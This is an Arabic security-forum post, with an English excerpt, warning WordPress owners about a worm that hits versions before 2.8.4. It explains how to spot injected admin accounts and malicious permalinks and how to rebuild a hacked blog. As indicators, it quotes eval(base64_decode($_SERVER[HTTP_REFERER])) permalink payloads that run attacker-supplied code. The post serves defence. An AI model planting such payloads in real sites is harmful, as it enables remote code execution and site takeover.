الســــلام عليكمم ورحمة الله وبركاته شباب,,,
توني قريا خبر "تحذير" من موقع الوورد برس الغني عن التعريف بتحديث بيانات جميع مستخدمين الوورد برس, سواء كأدمن - يوزر , حيث اعربوا بأن مستخدمين الوورد برس يتعرضون لهذا النوع من الإكسبلويت كل ساعه ! حيث يقوم المخترق بزع عضوية الأدمن عند تسجيله بلمدونة فقط !
Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!!
Update your WordPress blog before you continue reading this post. That’s how critical this issue is.
للوقاية من الثغره:
1- تحديث مدونتك الان, الإكسبلويت "0-d4y" يعمل على جميع إصدارات الوورد برس إلا 2.8.4 .
2- إصدار تقرير من الوورد برس : كيفية الحفـــاظ على مدونتك امنة, بلإضافة الى معلومات حول كيفية عمل تحديث فوري لمدونتك لإيقاف هذه الإكسبلويت ( وورم ).
3- إذا كنت تستخدم إصدار وورد برس رقم 2.7 سوف يظهر لك عند دخولك لوحة التحكم تحذير لتحديث مدونتك لأخر إصدار, وبحالة كنت تستخدم نسخة اقدم من 2.7 فوجب عليكم التحديق حالا, بحالة لم تستطع معرفة إصدار مدونتك,, وجب عليكم التحديث عبر الموقع الرسمي للورد برس من هنـــا حالا.
4- إستخدام إضافة وورد برس لحماية مدونتك: هذه الحالة ستكون إستثنائية لك بعد "تحديثك حاليا" لإصدار مدونتك, لاكن يوجد بعض الإضافات تساعدك بحماية مدونتك من التعليقات وغيرها من الامور المهمة,, لاكن بحالة عدم ترقية مدونتك, وجب عليكم الترقية الأن.
5- وورد برس غير أمن: برنامج وورد برس مامن بلحماية البرمجية والشكلية بنحو 97% من قبل خبيرين برمجة امنية للمواقع وتطويرات الويب, لاكن لايوجد برنامج على وجه الارض الا وتعرض للإختراق, وهذا الهجوم كان متوقع من قبل ! لاكن بإصدار وورد برس 2.8.4 تم ترقيعه بأمان ! وبحالة وجد او ظهر اي ثغره جديدة سواء خطيرة ام لا, ستقوم وورد برس بإعلام اعضائها على الترقيع بلحظات قليلة من قبل الخبرات بلتطوير والترقيع الامني المعد لها, حيث تملك وورد برس اكثر من 5,317,360 مليون مشترك بلعالم !
6- التخوف او الملل من التحديث حالا: إن هذا التحديث مطلوب من جميع اعضاء وورد برس, حيث ان هذه الثغره تعتبر قاتلة لمدونتك, فوجب عليكم الترقيع حالا وان لاتأجل الترقيع حتى وقت الإختراق ! ويفضل ايضا التاكد من تحديث إضافات الوورد برس لديك "إن وجد تحديث لها" حالا .
بحالة وجد تحديثات للوورد برس, فسيتم كتابة تحديث للموضوع داخل موضوعنا هذا لمنتدى سيكيورتي رولز, وسيتم إبلاغ اعضائنا بنفس اللحظة.
* اللحين معظم الشباب ومالكين المواقع الي يستخدمون الوورد برس يتسالون عن مدوناتهم ؟ هل هي مخترقة او لا ؟
اولا: يتم الإختراق عن طريق ثغره ( برايفت ) يتم تحديث معلومات العضو المسجل ( المخترق ) بحيث يصبح بمرتبه الأدمن ( المستهدف ) فللتاكد منها وجب عليكم الذهاب الى لوحة الأدمن, والتاكد من وجود عضويتك فقط ! فإن وجدت عضوية اخرى "تجهل صاحبها" فأنت مخترق ووجب عليكم إيقاف موقعك حالا, والافضل ان تغير مسار ملفاتك لمسار اخر "مؤقتا" والتاكد من نظافة ملفاتك من اي "كود خبيث" او "شل كود" بهم ,,وبعدها يقوم المخترق "بحالة عدم تاكدك او ترقيعك للمدوتة" بلولوج لمعلومات مهمة بموقعك مثل معلومات بريدك الإلكتروني إن كنت تحتفظ به بلمدونة, معلومات شخصية ومواضيع شخصية اخرى, ويمكنه ايضا من إختراق مدونتك بنفس اللحظة عن طريق رفع " شل كود " لمدونتك والتحكم بلموقع كامل ! وإن كانت إستضافتك ذات حماية عادية او متوسطة, وذالك يعتمد على المخترق, فيتم إختراق سيرفرك كامل من هذه الثغره, فنتمنى التحديث الفوري اللحين لمدونتك لحماية موقعك ومدونتك وسيرفرك ايضا !
صورة توضيحية
ثانيا: التاكد من "روابط دائمة" مدونتك ! مثال
كود:
%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
او
“/%&(%
كود:
7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
او
كود:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
هذه الأكواد هي عباره عن تشفير نوع "Eval" و “base64_decode” , يمكن المخترق من رفع شل كود لموقعك ( سيرفرك ) وإختراقك كامل.
فوجب عليكم إتباع النقطة الاولى الي ذكرتها من قبل, وإن تم وجودهم وجب عليكم حذفهم من "الروابط" بلوحة تحكمكم.
ثالثا: التاكد من عدم وجود "أدمن" إضافي بلوحة التحكم,, معظم الاوقات لإصدارات الوورد برس القديمة 2.7 واقدم ,, يوجد بعض الهاكات "تخفي" الأعضاء سواء أدمن او يوزر,, فتستطيع من خلال الذهاب للوحة التحكم ومن ثم الأعضاء إختيار السورس كود للصفحة والبحث فيها عن Administrator او Admin او user_ ,, فبحالة عدم وجود شي فإن شاء الله انت بامان,,,
صورة توضيحية
اللحين بعد المرور بكل هذه التوضيحات ماتوقع بإذن الله وجود اي سؤال او إستفسار لحد من الشباب,, ولاكن لو وجد فإن شاء الله نحلها لكم,,, لاكن بحالة "لاسمح الله" تم إختراق مدونتكم, او العبث بلقاعدة (شي اكيد المخترق راح يقوم بلعبث بلقاعدة, او رفع شل او اي شي اخر يبقيه علموقع ( Backdoor ) له,,, فلحل الافضل والأمن لكم هو تحميل هذه الإضافة للورد برس WordPress-to-WordPress Import WordPress Plugin ومن ثم عن طريقها ( بعد تثبيتها ) نقوم بإستخدام Export ( ضغط وتحميل ) معلومات مدونتنا من ( ردود - صور - ملفات - مواضيع ) كملف XML وحفظة بجهازنا , ومن ثم نقوم بتامين ( صور المدونة وملفاتنا إن وجدت ) وهذه المسارات عادة تكون داخل المدونة
كود:
/home/username/public_html/wp-content/uploads
او
كود:
/home/username/public_html/images
بلحالة هذه بعد الحفظ نقوم بحذف المدونة ( كاملة ) ومن ثم تصطيب مدونة جديدة من هذا الرابط ( الإصدار الاخير للوررد برس 2.8.4 - إضغط هنا ) , ومن ثم بعد التركيب نقوم بتركيب الإضافة الي قمنا بسحب معلومات مدونتنا فيها, ومن ثم نقوم بلضفط على Import للملف الي سحبناه من المدونة.
وبإذن الله ترجع المدونة 100% نظيفة من اي شل كود او كود خبيث من المخترق , وايضا من اي ( شك ) بنفسنا بعد الإختراق .
للتقليل من إختراق المدونات ( يرجى ) من الجميع نشر الخبر وتحذير كل مالك مدونة من هذه الإكسبلويت عبر هذا الموضوع او منكم شخصيا ( مسنجر او منتدى ),, بحيث تقلل من هذه الإختراقات لمدونات الوورد برس,, وبحالة وجود اي شي إضافي هذا الدعم الفني
( برنامج الوورد برس من هنا ).
الثغره ( الكود ) لم يتم الإعلان عنها بمواقع الحماية حاليا ,,, مثل ماقلت قبل الثغره اكيد برايفت مازالت, واتوقع صعب تظهر للجميع حاليا.
روابط لها صلة بلموضوع
How To Completely Clean Your Hacked WordPress Installation
Journey Etc. has a possible solution
WordPress-
to-WordPress Import WordPress Plugin
----
المصـــــدر
تحياتي
سيكيورتي رولز.